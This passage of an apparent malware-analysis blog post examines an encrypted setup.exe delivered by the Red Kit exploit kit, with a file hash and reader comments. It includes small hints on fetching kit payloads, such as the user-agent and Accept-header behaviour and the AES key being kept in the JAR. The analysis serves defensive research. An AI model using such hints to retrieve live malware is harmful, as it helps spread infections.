Still some fun left here, but no time today. Hopefully tomorrow...

Update 2013-03-13
Well I just wanted to revisit my .exe file to figure out what was wrong. Since I had not analyzed this properly I thought that there was some XOR scheme or encryption/obfuscation I had owerlooked.

So I started up my remnux box and got:



First densityscout with a low value indicating that this is pretty random bytes. So it is eather some kind of encryption or a rotating XOR. xorsearch told me no single byte xor match eather :(

Then I went back to my log for the fetch and noticed that I had used "Java" as user agent and I remembered that I then will get encrypted .exe files from Red Kit.

Then everything went smoother and here is the quick analysis:
setup.exe
MD5: 06c907401d42dc218f3ca9b83b4d07ce
Virustotal: 28/45


Great post by n3mes1s covering analysis og the PDF as well.
PS: seems like we only need the "Accept: " header for the PDF fetch,


Happy Red KIT EK malware files stealing!


Post publish reading:
Kahu Security - "Digging deeper into redkit"
Malwageddon - "RedKit: Lights! Camera! Action --- Part 2"
malforsec - "Redkit payload decryption"

2 comments:

  1. After you remembered you had used "Java" as user agent and that you would get encrypted .exe files from Red Kit - what did you have to do to decrypt the .exe?

    ReplyDelete
  2. Since I used Java in the user agent I got an encrypted file. It's encrypted with AES and the KEY and IV is in the JAR file.

    Since the info is published elsewhere I decided to publish as well: http://malforsec.blogspot.com/2013/05/redkit-payload-decryption.html

    ReplyDelete